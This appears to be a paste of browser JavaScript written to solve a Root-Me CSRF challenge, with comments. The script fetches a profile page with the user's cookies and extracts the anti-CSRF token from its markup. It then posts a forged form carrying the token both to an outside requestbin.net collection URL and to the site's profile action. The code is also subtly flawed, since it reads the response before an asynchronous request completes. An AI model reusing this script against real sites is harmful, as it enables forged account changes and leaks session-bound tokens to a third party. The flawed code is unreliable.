
Untitled

a guest Dec 8th, 2019 94 Never
  // Flat browser script; one XMLHttpRequest object is reused for every request.
  // In order, the statements:
  //   1. issue a GET for the profile page with withCredentials enabled,
  //   2. read xhr.responseText directly after send() and take the 32 characters
  //      that start 51 characters past the first match of 'input id="token"',
  //   3. assemble a multipart/form-data body with username, status and that token,
  //   4. POST the body to a requestbin.net URL, then POST it to the profile action.
  //
  // NOTE(review): the offsets 51 and 32 presumably match the challenge page's
  // markup and token length; neither is visible here, so confirm against the page.
  //
  // Defender's reading: an anti-CSRF token embedded in page markup can be read by
  // any script that is able to fetch that page with the user's cookies. Token
  // checks therefore depend on keeping untrusted script out of the origin
  // (output encoding, a restrictive Content-Security-Policy).
  var xhr = new XMLHttpRequest();
  xhr.withCredentials = true;

  // Request 1: fetch the profile page.
  xhr.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile");
  xhr.send();

  // Locate the token input in whatever responseText holds at this point.
  var resp = xhr.responseText;
  var n = resp.search('input id="token"');
  var token = resp.substring(n + 51, n + 51 + 32);

  // Form values submitted alongside the token.
  var username = 'blabla';
  var status = 'on';
  var boundary = '---------------------------' + Math.random().toString().substr(2);

  // Multipart body: one part per field, closed by the terminating boundary.
  var data = [
    '--' + boundary,
    '\r\nContent-Disposition: form-data; name="username"\r\n\r\n' + username + '\r\n',
    '--' + boundary,
    '\r\nContent-Disposition: form-data; name="status"\r\n\r\n' + status + '\r\n',
    '--' + boundary,
    '\r\nContent-Disposition: form-data; name="token"\r\n\r\n' + token + '\r\n',
    '--' + boundary + '--'
  ].join('');

  // Request 2: send the body to the request-logging endpoint.
  xhr.open("POST", 'http://requestbin.net/r/1d3jpxb1', true);
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
  xhr.setRequestHeader('Content-Length', data.length);
  xhr.send(data);

  // Request 3: send the same body to the profile action.
  xhr.open('POST', 'http://challenge01.root-me.org/web-client/ch23/?action=profile', true);
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
  xhr.setRequestHeader('Content-Length', data.length);
  xhr.send(data);